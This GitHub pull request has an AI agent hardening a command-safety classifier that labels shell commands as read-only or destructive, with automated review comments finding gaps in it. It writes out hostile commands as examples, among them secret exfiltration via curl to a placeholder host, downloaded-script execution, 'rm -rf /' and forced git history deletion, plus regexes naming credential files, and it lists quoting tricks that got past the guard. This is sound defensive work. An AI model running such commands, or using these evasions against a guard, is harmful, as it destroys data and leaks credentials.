Harden local decision advice, fix Claude 5.x connections and document hook routing upgrade - #243
Coding-Dev-Tools wants to merge 24 commits into
Conversation
With no decision backend configured, engraphis_decide answers from local heuristics. The command guard labeled exfiltrating pipes, forced branch deletion and file redirection read_only with a 0.95 safety probability, while missing dd of=, rm with later or clustered flags, git reset --hard, git clean -f and DROP TABLE. Label read_only only for one simple inspection command without chaining, pipes, substitution or file redirection, and recognize destructive, history-rewriting, exfiltrating and credential-file commands in any flag order. Screen a bounded prefix with linear patterns so the worst 16,000-character input costs about 0.07 s instead of 3.9 s; a command too long to screen completely is never labeled read_only. Completion checks now match whole words and ignore zero counts; support and contradiction checks compare content words instead of shared stopwords. allow_auto stays false and remote advice is still returned as provided. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
The SessionStart hook used to fall back to a workspace named after the project folder. It now omits workspace, so without a saved mapping the server resolves to default and upgraded users silently lose their earlier session-start context. Document the one-time mapping that restores it. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
The workspace filter is already distributed into the indexed src/dst branches, so the leftover if/pass block had no effect. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
Rerun the public offline fixtures after the mcp_server and store edits. Aggregates are identical to v115; only those two source hashes change. Refresh the registry references and charts, and correct the changelog's stale v111 reference. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
Codex Review SummaryThis comment shows the latest Codex review activity on this pull request.
ℹ️ About Codex in GitHubYour team has set up Codex to review pull requests in this repo. Reviews are triggered when you
Codex reacts with 👀 while any review is running, comments if it has suggestions, and reacts with 👍 once all reviews finish with no findings. |
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 07b3c701e2
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| re.compile(r"\bgit\s+(?:reset\b[^\n;&|]*?\s--hard\b|stash\s+(?:drop|clear)\b" | ||
| r"|clean\b[^\n;&|]*?\s(?:-(?=[a-zA-Z]*f)[a-zA-Z]+|--force)(?=\s|$)" | ||
| r"|branch\b[^\n;&|]*?\s-(?=[a-zA-Z]*D)[a-zA-Z]+(?=\s|$))"), | ||
| re.compile(r"\bgit\s+(?:checkout|restore)\b(?![^\n;&|]*\s--staged\b)[^\n;&|]*?\s(?:--\s+)?\.(?=\s|$)"), |
There was a problem hiding this comment.
Treat forced checkouts as destructive
A forced branch checkout such as git checkout -f main does not match this path-only . pattern, so the local guard returns state_change with safety probability 0.5 rather than destructive_or_leak with 0.05. git checkout -h explicitly describes -f, --force as “force checkout (throw away local modifications),” so this is precisely a work-discarding Git operation the new classifier intends to recognize; include forced checkout/switch forms in this branch.
Useful? React with 👍 / 👎.
| if overlap and _SUPERSESSION_CUES.search(state.lower()): | ||
| verdict = "contradicts_and_supersedes" |
There was a problem hiding this comment.
Require subject overlap before declaring supersession
With the newly added cues such as switched and replaced, any single shared content token now produces contradicts_and_supersedes. For example, “We switched logging to JSON” against “We use JSON for API responses” is classified as superseding solely because both mention JSON, although the facts concern different subjects. When the local fallback is used, callers therefore receive incorrect contradiction advice; require stronger subject/claim overlap before returning the supersession verdict.
Useful? React with 👍 / 👎.
…rsession Forced checkouts and switches (git checkout -f, git switch --discard-changes) throw away local modifications but were labeled state_change; recognize them as destructive. The new supersession cues let a single incidental shared word produce contradicts_and_supersedes, so "We switched logging to JSON" superseded "We use JSON for API responses". Require a cue absent from the existing fact plus a shared subject (at least two shared content words covering half of the shorter fact); a cue without that subject now defers as orthogonal, and identical negated facts reinforce instead of contradicting. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
Rerun the public offline fixtures after the mcp_server review fixes. Aggregates remain identical to v115; refresh the registry references, charts and changelog reference. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: d302365329
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| re.compile(r"\bgit\s+push\b[^\n;&|]*?\s(?:--force(?:-with-lease|-if-includes)?|-f|--delete|-d" | ||
| r"|--mirror|\+\S+|:\S+)(?=[\s=]|$)"), |
There was a problem hiding this comment.
Recognize Git global options before destructive subcommands
When a valid global option appears between git and the subcommand, every destructive Git pattern is bypassed. For example, git -C /tmp/repo push -f origin main and git -C /tmp/repo reset --hard HEAD~1 are labeled state_change with probability 0.5 instead of destructive_or_leak; the inspected git -h synopsis explicitly permits [-C <path>] ... <command>. Account for Git's global-option prefix before matching these subcommands.
Useful? React with 👍 / 👎.
| new_cues = (set(_SUPERSESSION_CUES.findall(state.lower())) | ||
| - set(_SUPERSESSION_CUES.findall(existing_content.lower()))) |
There was a problem hiding this comment.
Normalize equivalent negation cues before comparison
Because the cue sets retain the literal matches n't and not, equivalent negative restatements are treated as introducing a new cue. For example, The API doesn't use port 80 against The API does not use port 80 has sufficient subject overlap but produces contradicts_and_supersedes rather than reinforces; normalize contraction cues to their full-form equivalents before subtracting the sets.
Useful? React with 👍 / 👎.
…advice
Git global options before the subcommand (git -C repo push -f, git -c
k=v clean -fdx, including quoted -C paths) bypassed every destructive Git
pattern. Share a bounded global-option prefix across those patterns; the
bound keeps repeated "git" tokens constant-cost.
Fold every negation form (not, no, never, n't) into one supersession cue,
so "doesn't" versus "does not" reinforces instead of contradicting.
Treat negated success ("did not pass", "didn't succeed", "not ok") as
failure and "none failed" or "passed: 0" as zero counts in completion
checks. Also flag downloaded-script execution (bash <(curl ...),
sh -c "$(curl ...)", iex (...)), history-destroying Git commands
(filter-branch, filter-repo, reflog expire, update-ref -d), ALTER TABLE
... DROP COLUMN, and more credential files (id_rsa outside .ssh,
.kube/config, .docker/config.json, .npmrc, .pypirc).
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
Rerun the public offline fixtures after the mcp_server fixes. Aggregates remain identical to v115; refresh the registry references, charts and changelog reference. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: b179129391
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| elif len(overlap) >= 3: | ||
| # Supersession needs a cue the existing fact lacks and a shared subject, not one | ||
| # incidental shared word; a cue without that subject defers rather than reinforces. | ||
| new_cues = _supersession_cues(state) - _supersession_cues(existing_content) |
There was a problem hiding this comment.
Preserve negation targets when comparing contradictions
When both facts contain the same negation cue but apply it to different objects, subtracting cue sets erases the contradiction: for example, candidate Use npm, not pnpm against existing Use pnpm, not npm produces identical token and cue sets and is labeled reinforces. This gives callers reinforcement advice for mutually exclusive facts, so the comparison must retain which term each negation modifies rather than treating negation as an unordered set.
AGENTS.md reference: AGENTS.md:L174-L176
Useful? React with 👍 / 👎.
| re.compile(_GIT_COMMAND + r"(?:checkout|restore)\b(?![^\n;&|]*\s--staged\b)[^\n;&|]*?\s" | ||
| r"(?:--\s+)?\.(?=\s|$)|" + _GIT_COMMAND + r"(?:checkout|switch)\b[^\n;&|]*?\s" | ||
| r"(?:-(?=[a-zA-Z]*f)[a-zA-Z]+|--force|--discard-changes)(?=\s|$)"), |
There was a problem hiding this comment.
Classify path-specific Git restores as destructive
When a user discards changes to a specific file, such as git checkout -- README.md or git restore README.md, this pattern only recognizes the literal . pathspec and returns state_change with probability 0.5 instead of destructive_or_leak. The inspected git checkout -h synopsis explicitly accepts -- <file>..., while git restore -h describes restoring the worktree as the default, so the new work-discarding guard should cover arbitrary pathspecs while retaining the --staged exemption.
Useful? React with 👍 / 👎.
Identical cue sets could still hide a contradiction when each fact rules out what the other asserts: "Use npm, not pnpm" versus "Use pnpm, not npm" reinforced. Track the term each fact rules out (not/no/never/n't X, instead of X, rather than X) and treat a term one fact rules out but the other asserts as a supersession signal, still gated on a shared subject. git checkout -- <path> and git restore <path> discard uncommitted changes just like the "." forms, so recognize any checkout path after "--" and any worktree restore with a pathspec, keeping the --staged exemption. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
…ence Rerun the public offline fixtures after the mcp_server fixes. Aggregates remain identical to v115; refresh the registry references, charts and changelog reference. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: c8d2dc24ad
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| r"|reflog\s+expire\b|update-ref\b[^\n;&|]*?\s-d(?=\s|$))"), | ||
| # Checkout paths after "--" or ".", worktree restores and forced switches discard work. | ||
| re.compile(_GIT_COMMAND + r"(?:checkout\b[^\n;&|]*?\s(?:--|\.)(?=\s|$)" | ||
| r"|restore\b(?![^\n;&|]*\s--staged\b)(?=[^\n;&|]*\s[^\s-])" |
There was a problem hiding this comment.
Treat staged worktree restores as destructive
The negative lookahead exempts every restore containing --staged, including git restore --staged --worktree app.py, which restores both the index and working tree and therefore discards local modifications while receiving state_change with probability 0.5. I checked the local git restore -h: -S restores the index, while -W restores the working tree; exempt only staged-only restores, not commands that also specify --worktree.
Useful? React with 👍 / 👎.
| r"|(?:checkout|switch)\b[^\n;&|]*?\s(?:-(?=[a-zA-Z]*f)[a-zA-Z]+|--force" | ||
| r"|--discard-changes)(?=\s|$))"), |
There was a problem hiding this comment.
Detect force-create branch resets
The forced checkout/switch alternatives omit git switch -C/--force-create and git checkout -B, so commands such as git switch -C main HEAD~3 are classified as ordinary state_change rather than destructive history rewrites. The inspected git switch -h describes -C as “create/reset and switch to a branch”; include these reset-existing-branch forms alongside --force and --discard-changes.
Useful? React with 👍 / 👎.
| elif len(overlap) >= 3 or jaccard(cand_tokens, exist_tokens) >= 0.5: | ||
| verdict = "reinforces" |
There was a problem hiding this comment.
Avoid reinforcing short facts with conflicting values
The new jaccard >= 0.5 fallback labels short key-value facts that differ only in their value as reinforcement: for example, Primary database is Postgres versus Primary database is SQLite has two shared tokens out of four and returns reinforces. When no explicit supersession cue is present, this should defer rather than advise reinforcing a mutually exclusive fact, or compare the differing value before applying the similarity threshold.
AGENTS.md reference: AGENTS.md:L174-L176
Useful? React with 👍 / 👎.
… resets
Short facts that differ only in a value ("Primary database is Postgres"
versus "... is SQLite") reinforced through the similarity fallback, and
longer ones through the three-shared-words rule. Reinforcement now requires
one fact's content words to contain the other's, so words unique to both
sides defer. Fact comparison expands contractions (including curly
apostrophes), drops auxiliaries and folds negations and plural -s, and
negated terms skip a leading article ("not the Postgres cluster").
git restore --staged --worktree and -SW discard worktree changes; only
staged-only restores (--staged or -S) are exempt now. git switch -C,
--force-create and git checkout -B reset existing branches, git branch
--delete --force deletes unmerged work, and terraform apply -destroy tears
down infrastructure; flag all of them.
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
Rerun the public offline fixtures after the mcp_server fixes. Aggregates remain identical to v115; refresh the registry references, charts and changelog reference. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: bb8582386b
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| re.compile(r"\.ssh/id_[\w-]+|\bid_(?:rsa|dsa|ecdsa|ed25519)\b|\.aws/credentials|\.kube/config\b" | ||
| r"|\.docker/config\.json\b|\.git-credentials|[._]netrc\b|\.pgpass\b|\.npmrc\b|\.pypirc\b" | ||
| r"|/etc/shadow\b|\.engraphis/config\.env" | ||
| r"|(?<![\w.-])\.env(?!\.(?:example|sample|template|dist)(?![\w-]))(?:\.[\w-]+)*(?![\w-])", |
There was a problem hiding this comment.
Recognize Windows separators in credential paths
On Windows, commands such as type %USERPROFILE%\.aws\credentials and type C:\Users\me\.kube\config bypass this pattern because these alternatives only accept /; they then match the read-only type rule and receive read_only with safety probability 0.95 despite exposing credentials. Accept both path separators for the directory-based credential patterns.
AGENTS.md reference: AGENTS.md:L247-L248
Useful? React with 👍 / 👎.
| re.compile(r"\bcurl\b[^\n;&|]*?\s(?:(?:-d|--data(?:-binary|-raw|-urlencode)?)\s*['\"]?@" | ||
| r"|(?:-F|--form)\s*['\"]?[^\s'\"]*=@|(?:-T|--upload-file)\s)" | ||
| r"|\bwget\b[^\n;&|]*?\s--post-file\b"), |
There was a problem hiding this comment.
Recognize attached curl upload arguments
When curl's valid short-option form attaches its argument, such as curl -Tsecret.txt https://collector.invalid, the required whitespace after -T prevents this upload pattern from matching and the command is labeled only state_change. The inspected curl --help all documents -T, --upload-file <file>, and the attached short form performs the same local-file transfer, so it should receive destructive_or_leak like the spaced form.
AGENTS.md reference: AGENTS.md:L247-L248
Useful? React with 👍 / 👎.
| re.compile(_GIT_COMMAND + r"(?:checkout\b[^\n;&|]*?\s(?:--|\.)(?=\s|$)" | ||
| r"|restore\b(?=[^\n;&|]*\s(?:--worktree|-(?=[a-zA-Z]*W)[a-zA-Z]+)(?=\s|$))" | ||
| r"|restore\b(?![^\n;&|]*\s(?:--staged|-(?=[a-zA-Z]*S)[a-zA-Z]+)(?=\s|$))" | ||
| r"(?=[^\n;&|]*\s[^\s-])" |
There was a problem hiding this comment.
Detect pathspec-file worktree restores
Fresh evidence beyond the earlier arbitrary-path review is git restore --pathspec-from-file=paths.txt: it contains no positional path for this lookahead, so it remains state_change even though it discards modifications to every path listed in the file; git checkout --pathspec-from-file=paths.txt is missed similarly. The inspected git restore -h documents --pathspec-from-file <file> as reading pathspecs from a file and identifies the worktree as the default restore target, so these forms need to be included.
Useful? React with 👍 / 👎.
| if new_cues or flipped: | ||
| verdict = "contradicts_and_supersedes" if shared_subject else "orthogonal" |
There was a problem hiding this comment.
Require matching values before superseding negated facts
Fresh evidence after the earlier overlap fix is that The API does not use port 80 against The API uses port 443 still returns contradicts_and_supersedes: the generic tokens api, use, and port satisfy shared_subject, while the new negation cue triggers this branch even though both facts can be true. This produces incorrect supersession advice for different values of the same property; require the negation to oppose an asserted value or defer as orthogonal.
AGENTS.md reference: AGENTS.md:L174-L176
Useful? React with 👍 / 👎.
…rd checks A negation opposed anything sharing a subject: "The API does not use port 80" superseded "The API uses port 443", and a negated fact could reinforce a positive one. Capture the whole clause each negation rules out (not, no longer, never, n't, instead of, rather than) and treat a negation as opposing only when the other fact asserts that clause. Replacement cues such as "switched" keep the shared-subject rule, and reinforcement now requires matching cue sets. Credential paths accept Windows separators, so reading %USERPROFILE%\.aws\credentials with type is no longer read_only. curl recognizes attached upload arguments (-Tsecret.txt), and restores or checkouts driven by --pathspec-from-file count as discarding work. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
Rerun the public offline fixtures after the mcp_server fixes. Aggregates remain identical to v115; refresh the registry references, charts and changelog reference. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 4cb49090e1
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| re.compile(_GIT_COMMAND + r"push\b[^\n;&|]*?\s(?:--force(?:-with-lease|-if-includes)?|-f" | ||
| r"|--delete|-d|--mirror|\+\S+|:\S+)(?=[\s=]|$)"), |
There was a problem hiding this comment.
Detect force flags inside push option clusters
When Git short options are clustered, this alternative recognizes only a standalone -f, so git push -uf origin HEAD:main receives state_change with probability 0.5. I checked git push -h, which documents both -u and -f, and confirmed against a local bare repository that the clustered form performs a forced update; inspect valid short-option clusters for f rather than requiring the literal standalone flag.
AGENTS.md reference: AGENTS.md:L264-L267
Useful? React with 👍 / 👎.
| _GIT_COMMAND = (r"\bgit(?:\s+(?:-[Cc]\s+(?:\"[^\"\n]*\"|'[^'\n]*'|\S+)" | ||
| r"|--?[A-Za-z][\w-]*(?:=\S+)?)){0,8}\s+") |
There was a problem hiding this comment.
Do not cap valid Git global options at eight
Fresh evidence beyond the earlier git -C case is that Git accepts commands with more than eight global options: for example, nine -p options before push -f are valid, but the {0,8} prefix fails and the force push is labeled state_change instead of destructive_or_leak. Preserve the bounded-cost requirement without making the destructive classification depend on an arbitrary count of valid global options.
AGENTS.md reference: AGENTS.md:L264-L267
Useful? React with 👍 / 👎.
| text = re.sub(r"\b(?:can|won|shan)'t\b", lambda match: _IRREGULAR_CONTRACTIONS[match.group(0)], | ||
| _plain(text)) | ||
| text = re.sub(r"n't\b", " not", text) |
There was a problem hiding this comment.
Normalize
cannot before comparing negation targets
Fresh evidence beyond the earlier equivalent-contraction case is that The API cannot use port 80 versus The API can't use port 80 returns contradicts_and_supersedes: only the apostrophe form is converted to not, so its ruled-out clause appears to oppose the otherwise equivalent cannot fact. Normalize the single-word form as well so equivalent negative facts reinforce rather than trigger incorrect supersession advice.
AGENTS.md reference: AGENTS.md:L174-L176
Useful? React with 👍 / 👎.
The global-option prefix stopped at eight options, so nine valid -p flags before push -f escaped the check. Drop the cap: an option argument now never starts a nested bare "git" (quoted or not), so candidate spans stay disjoint and adversarial input remains linear. git push accepts clustered short flags (-uf), so inspect clusters for f or d instead of requiring standalone flags. Treat "cannot" like "can not" so equivalent negations reinforce and "cannot use port 80" opposes "uses port 80" instead of reinforcing it. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
Rerun the public offline fixtures after the mcp_server fixes. Aggregates remain identical to v115; refresh the registry references, charts and changelog reference. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 13ac391253
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| r"(?:\b(?:not|never)|n't)\s+(?:\w+\s+){0,2}?" | ||
| r"(?:pass(?:ed|es)?|succe(?:ss|ed|eded)\w*|complete[ds]?|ok)\b") |
There was a problem hiding this comment.
Exclude contrastive phrases from negated-success matching
When successful output uses a contrastive construction such as The tests not only passed but completed faster or The suite did not just pass, it succeeded, this pattern treats not only passed/not just pass as a failure. _heuristic_decision therefore returns is_complete=false with probability 0.1 despite the explicit success, so the negation check needs to distinguish these constructions or account for a later affirmative result.
Useful? React with 👍 / 👎.
| if kind == "verify_support": | ||
| q_tokens = set(re.findall(r"\w+", query.lower())) | ||
| ev_tokens = set(re.findall(r"\w+", state.lower())) | ||
| q_tokens, ev_tokens = tokenize(query), tokenize(state) |
There was a problem hiding this comment.
Preserve meaningful one-character support terms
When the query is a meaningful one-character term such as the programming language C or R, tokenize() drops that term because it filters tokens of length one. For example, query C with evidence Written in C now produces an empty query-token set and returns supported=false with probability 0.0, whereas the previous tokenization recognized the exact match; retain meaningful one-character terms for this support check.
Useful? React with 👍 / 👎.
| shared_subject = (len(overlap) >= 2 and | ||
| 2 * len(overlap) >= min(len(cand_tokens), len(exist_tokens))) |
There was a problem hiding this comment.
Allow direct negations of terse facts to supersede
Fresh evidence after the subject-overlap hardening is that terse contradictory facts such as candidate No SQLite versus existing Use SQLite are now classified as orthogonal: sqlite is correctly extracted as the ruled-out clause and is asserted by the existing fact, but the unconditional two-token subject threshold rejects the contradiction. This also affects forms such as Never npm versus Use npm, preventing callers from receiving supersession advice for facts that directly negate the existing value.
AGENTS.md reference: AGENTS.md:L174-L176
Useful? React with 👍 / 👎.
"not only passed" and "did not just pass" are contrasts, so they no longer count as negated success, and "did not fail" or "never errored" no longer counts as a failure. "nothing failed", "without errors" and "error-free" are zero outcomes; "errored" and "failing" are failures. Completion checks normalize curly apostrophes and "cannot" the way the contradiction checks do, so a curly "didn't pass" is a failure. Support checks keep standalone one-character terms such as "C" and drop contraction and possessive endings, so "Written in C" supports the query "C" and "it's" leaves no stray "s". Between terse facts, one shared word is the subject: "No SQLite" and "Never npm" oppose "Use SQLite" and "Use npm". Longer facts still need two shared words, so "The API is not public" stays orthogonal to "The public website uses Next.js". Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
…ence Rerun the public offline fixtures after the mcp_server fixes. Aggregates remain identical to v115; refresh the registry references, charts and changelog reference. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
|
You have reached your Codex usage limits for code reviews. You can see your limits in the Codex usage dashboard. |
Both branches added offline-fixtures-v116 and v117 with different bytes and repointed the same evidence references, so whichever merged second would conflict. Stack these follow-ups on #242 instead: keep its v116 and v117 artifacts, keep this branch's references until the next commit binds the merged tree, and list the follow-ups as unreleased above the 1.7.9 changelog section. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
"The flaky test no longer passes" counted as success, and "no longer fails" counted as a failure. Contradiction checks already read "no longer" as a negation; completion checks now do too. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
Opus 4.7+, Sonnet 5+, and Fable reject temperature, and the models that think by default (Opus 5+, Sonnet 5+, Fable) lead the reply with a thinking block, so the client sent a rejected parameter and then failed with "Unexpected Anthropic response format" on any successful reply. - Omit sampling parameters for models that reject them; keep them for older models and unrecognized ids so legacy behavior is unchanged. - Read the reply from text blocks instead of content[0]. - For default-thinking models send output_config.effort (new ENGRAPHIS_LLM_EFFORT, default medium) and keep at least 4096 output tokens. - Replace the retired claude-3-5-sonnet-20241022 default (dashboard picker, API defaults, .env.example, provider guide) with claude-sonnet-5-5. - Document how to back the experimental Jev adapter with Claude (exact pinned id, fallback off, no sampling parameters or forced tool choice) and test that aliases ending in "latest" are rejected. Cherry-picked from 23af8f5 on claude/pensive-ritchie-i8s7jl, which had no pull request. Its v81 evidence refresh is dropped because v81 already names a different artifact on this stack; a later commit binds these sources. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
…stub The stubbed /llm/status response and its assertion still named the retired claude-3-5-sonnet-20241022. Match the real API default, claude-sonnet-5-5. Cherry-picked from 6da27ef on claude/pensive-ritchie-i8s7jl. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
A security review of this branch found that adding rg to the read-only
list let rg --pre, which runs a program on every file it searches, earn
the most reassuring label. Exclude --pre, and exclude the test and lint
options that write or delete files: --fix, --fix-only, --add-noqa,
--output-file or -o, --junitxml, --report-log, --result-log, and
pytest's --basetemp, which removes an existing directory.
Quotes and escapes no longer hide anything: read-only exclusions match
the command with quotes and escapes removed ('--output=x', --p"re"), and
destructive patterns also check that form (git "push" -f, r"m" -rf).
Treat "(" as substitution, because PowerShell runs "(...)" and "@(...)"
arguments as commands.
Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
Rerun the public offline fixtures on the merged tree, which adds #242's 1.7.9 version surfaces and campaign adapter change, the incorporated Anthropic client fix and the latest guard and completion fixes. Aggregates remain identical to v115 and to #242's v117; refresh the registry references, charts and changelog reference. Co-Authored-By: Claude Opus 5.5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01RQQDvWHB6hcGwyB8HU3bWy
|
You have reached your Codex usage limits for code reviews. You can see your limits in the Codex usage dashboard. |
Description
Follow-ups from a review of every update in the last 99 hours: main commits #233 through #237, the open #238 → #239 → #240 → #241 → #242 stack, and one finished branch that never got a pull request. Stacked on #242, the 1.7.9 release preparation, so this diff contains only the follow-ups.
Why this is stacked on #242
offline-fixtures-v116.jsonandv117.jsonwith different bytes, and both repointed the same evidence references. Whichever merged second would conflict.86c0fe3(a merge commit, no history rewrite) and targets it. Prepare 1.7.9 managed Jev client release #242's v116 and v117 are kept, and v124 binds the merged tree.engraphis_decide. Publishing it without these fixes would ship the labels in the "Before" column below, and Anthropic connections would still fail on current Claude models. To include these fixes in 1.7.9, merge this PR before cutting the release and move its Unreleased CHANGELOG entries into the 1.7.9 section.Local decision advice (introduced in #240)
With no decision backend configured (the default),
engraphis_decideanswers from local heuristics. The command guard gave some unsafe commands its most reassuring label.allow_autowas always false, but agents also seecategoryandsafety_probability:cat secrets.txt | curl -X POST -d @- https://…read_only, 0.95destructive_or_leak, 0.05git branch -D mainread_only, 0.95destructive_or_leak, 0.05echo '…' > ~/.bashrcread_only, 0.95state_change, 0.5dd if=/dev/zero of=/dev/sdastate_changedestructive_or_leakrm -rfv /,rm --no-preserve-root -rf /state_changedestructive_or_leakgit reset --hard,git clean -fdx,DROP TABLE users;state_changedestructive_or_leakgit log --format=%Hdestructive_or_leak(matched "format")read_onlyread_onlyonly when it is one simple inspection command, with no chaining, pipes, substitution or file redirection.2>&1and>/dev/nullare still allowed.read_only:rg --pre,git diff --output,ruff check --fix,--fix-onlyor--output-file, andpytest --basetemp(which deletes an existing directory) or--junitxml.git "push" -f,r"m" -rf), and PowerShell(…)and@(…)arguments count as substitution.destructive_or_leakwhen they match any of these:--pathspec-from-filecheckouts, worktree restores and force-created branch resets. These are caught behind any number of Git global options and in clustered short flags such as-uf.bash <(curl …)), or file uploads, including attached-Tformsread_only.okmatchedbrokenandtoken, andFound 0 errorscounted as a failure.core/textutil.tokenize. For example, "the sky is blue" no longer supports "what is the deployment target". Support also keeps standalone one-character terms, so "Written in C" supports the query "C". Contraction endings such as the "s" in "it's" are not terms.orthogonal.The existing contract is unchanged:
allow_auto=falseandescalate_to_user=trueon every command decision, and remote advice is returned as provided.Claude 5.x connections (from
claude/pensive-ritchie-i8s7jl)That branch was finished earlier today by another Claude session, but no pull request was ever opened for it. Its two commits are cherry-picked here with their original authorship (
d42c413,1c473e2); their code changes are byte-identical to the originals.temperatureto current Opus, Sonnet and Fable models, which reject it. It also read only the first content block, so a reply that led with a thinking block failed with "Unexpected Anthropic response format". Together, these broke every successful call to current thinking models.output_config.effortfrom a newENGRAPHIS_LLM_EFFORTsetting (defaultmedium, limited to the five documented levels) and at least 4,096 output tokens..env.exampleand provider guide now points to the current Sonnet.Other fixes
default, so upgraded users quietly lost their session-start context. WORKSPACE_ORGANIZATION, README and CHANGELOG now say to save one mapping to keep those memories.if flt and flt.workspace_id: passfromStore.edges_for. Query behavior is unchanged.Security review
/security-reviewof this PR's diff found one issue that this PR introduced. Addingrgto the read-only list letrg --pre <program>, which runs a program on every file it searches, earnread_onlywith 0.95.c5c27b8fixes it, together with the related gaps listed above (file-writing options, quoted options and commands, PowerShell subexpressions). The Anthropic client change adds no new trust boundary: effort comes only from validated settings, and parse errors never echo the provider payload.Codex review of this PR
Codex has raised nineteen P2 findings across seven passes. All are fixed with regression tests, and each fix's tests fail before it:
